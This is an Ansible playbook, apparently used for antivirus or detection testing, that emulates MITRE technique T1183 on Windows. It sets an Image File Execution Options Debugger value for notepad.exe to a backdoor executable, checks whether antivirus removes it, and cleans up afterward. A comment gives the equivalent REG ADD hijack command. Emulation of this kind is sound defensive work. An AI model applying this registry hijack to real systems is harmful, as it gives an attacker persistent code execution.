# attack_technique: T1183
- name: T1183 - Image File Execution Options Injection
  hosts: windows
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
  - name: Attaches Command Prompt As Debugger To Process - HKCURUN
    #REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d payload.exe
    tags: always
    win_regedit:
      path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
      name: Debugger
      data: "{{ backdoor_exe }}"
      type: string
      
  - name: sleep for 10 seconds and continue with play to check if AV removed or Not
    tags: always
    wait_for: timeout=10
    delegate_to: localhost		
  - name: Check REG debugger exist
    tags: always
    win_reg_stat:
      path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
      name: Debugger
    register: T1183
  - name: check if playbook was blocked
    tags: always
    debug: msg="Playbook Completed#T1183#blocked#win#"
    when: T1183.exists == False        
  - name: check if playbook was successfull
    tags: always
    debug: msg="Playbook Completed#T1183#passed#win#"
    when: T1183.exists
  
  - name: cleanup HKCURUN      
    tags: always
    win_regedit:
        path: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
        state: absent
    when: T1183.exists
         

         
